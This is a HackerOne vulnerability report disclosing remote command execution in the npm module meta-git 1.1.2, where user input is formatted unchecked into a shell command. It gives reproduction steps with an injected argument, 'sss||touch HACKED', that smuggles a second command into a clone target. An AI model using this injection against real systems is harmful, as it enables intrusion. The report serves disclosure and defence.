Node.js third-party modules: [meta-git] RCE via insecure command formatting

ID H1:728040
Type hackerone
Reporter mik317
Modified 2020-01-11T11:57:31


I would like to report a RCE issue in the meta-git module. It allows to execute arbitrary commands remotely inside the victim's PC


module name: meta-git version: 1.1.2 npm page:

Module Description

> git plugin for meta

Module Stats

[~60] downloads in the last day [429] downloads in the last week [~2k] downloads in the last month

Vulnerability Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here:

Steps To Reproduce:

  1. Create a new directory and insert some test files:

bash mkdir tests cd tests touch test touch secret touch files 1. Check there aren't files called HACKED 1. Execute the following commands in another terminal:

bash npm i meta-git -g # Install affected module meta-git clone 'sss||touch HACKED' # *HACKED* file is created 1. Recheck the files: now HACKED has been created :) {F624209}


> Don't format commands using insecure user's inputs :)

Supporting Material/References:

  • [NODEJS VERSION]: 10.16.3
  • [NPM VERSION]: 6.0.9

Wrap up

  • I contacted the maintainer to let them know: [N]
  • I opened an issue in the related repository: [N]


RCE via command formatting on meta-git